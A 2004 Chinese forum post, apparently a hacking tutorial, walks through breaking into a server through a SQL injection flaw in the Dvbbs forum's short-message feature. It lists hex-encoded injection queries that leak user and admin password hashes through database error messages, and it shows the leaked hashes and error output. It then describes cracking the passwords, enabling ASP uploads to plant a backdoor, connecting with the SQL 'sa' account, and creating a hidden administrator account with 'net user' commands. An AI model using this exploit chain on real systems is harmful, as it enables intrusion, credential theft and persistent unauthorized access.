第一步:用注册好的用户名登陆,登陆时选择保存cookie,撰写短消息,保存
第二步:利用下边网页提交信息
username使用SQL Encoder编码,这里我们用一个管理员的名字radiofly
提交
select userpassword from [user] where username=0x72006100640069006f0066006c007900 and userpassword>7
得到
Microsoft VBScript 编译器错误 错误 '800a03f6'
缺少 'End'
/iisHelp/common/500-100.asp,行242
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
将 nvarchar 值 '78e4ea2181b00d21' 转换为数据类型为 int 的列时发生语法错误。
/bbs/messanger.asp,行619
78e4ea2181b00d21就是radiofly的前台密码
提交
select password from admin where username=0x72006100640069006f0066006c007900 and password>7
得到后台密码 acaa91f51ed197c7
用dvbbs密码猜解工具猜解密码 等待 等待 再等待。。。。。。ok
得到密码后登陆进入后台,修改文件上传类型,添加asp类型,上传asp后门
得到sql数据库的sa密码,使用sqlexec连接
net user admin$ xiaoxue /add
net localgroup administrators admin$ /add
到此 over :)
by 小路
作者: 飞鸟设计 时间: 2004-11-9 07:15 标题: 利用dvbbs短消息漏洞入侵服务器动画
